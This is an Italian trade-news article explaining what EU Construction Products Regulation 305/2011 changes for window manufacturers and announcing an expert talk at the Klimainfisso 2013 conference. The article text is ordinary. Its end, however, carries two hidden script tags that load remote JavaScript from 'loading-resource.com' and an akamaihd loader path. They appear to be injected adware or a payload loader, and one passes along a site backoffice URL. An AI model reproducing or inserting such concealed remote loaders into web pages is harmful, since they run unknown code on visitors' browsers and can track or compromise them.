1. Home
  2. Notizie e Mercato
  3. Regolamento Prodotti da Costruzione: che cosa cambia per i serramentisti?

Regolamento Prodotti da Costruzione: che cosa cambia per i serramentisti?

Infissi e Serramenti di
Entrerà in pieno vigore il 1° luglio 2013. Avrà un forte impatto su tutta l’industria delle costruzioni e dei suoi fornitori come i produttori di infissi


Tuttavia non molti lo conoscono ancora e soprattutto non ne conoscono le conseguenze sulla loro attività quotidiana. E’ il Regolamento Prodotti da Costruzione 305/2011, che parzialmente è già entrato in vigore e che sostituisce la Direttiva Prodotti da Costruzione, sarà il tema principale dell’incontro di apertura del Convegno internazionale di Klimainfisso giovedì 7 marzo 2013., h. 13.30.

Tra le principali novità rispetto alla vecchia Direttiva:
-    Introduzione di un settimo requisito di base incentrato sull’uso sostenibile delle risorse naturali;
-    Passaggio dalla Dichiarazione di idoneità all’impiego alla Dichiarazione di prestazione;
-    Introduzione della Dichiarazione di prestazione in luogo della Dichiarazione di conformità;
-    Riduzione dei sistemi di attestazione della conformità da 6 a 5;
-    Impiego di cascading ITT e shared ITT con l’utilizzo della Documentazione Tecnica Appropriata;
-    Applicazione di procedure semplificate per le microimprese;
-    Gestione dei prodotti unici attraverso la Documentazione Tecnica Specifica.

Sono tanti, come si può notare, gli aspetti che incideranno sulla vita dei produttori di serramenti in termini sia di opportunità che di vincoli. Dell’impatto sul settore e delle conseguenze pratiche per i serramentististi parleranno in qualità di esperti l’ing. Sergio Botta dello Studio Botta & Associati (in lingua italiana senza traduzione)  e quindi l’ing. Heinz Pfefferkorn dello Studio gbd ZT GmbH (in lingua tedesca senza traduzione).

All’incontro sul Regolamento Prodotti da Costruzione ne seguiranno, sempre nell’ambito del Convegno Internazionale di Klimainfisso, altri quattro su temi che vanno dalla corretta posa opera nel rinnovo, ai sistemi innovativi di schermatura solare, alle applicazioni vetrarie e all’efficienza energetica e all’impatto ambientale.

Quota di iscrizione giornaliera ai convegni: 50€, comprendente un biglietto di ingresso alla fiera
Per ulteriori informazioni: http://www.fierabolzano.it/klimainfisso/congresso.htm



<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>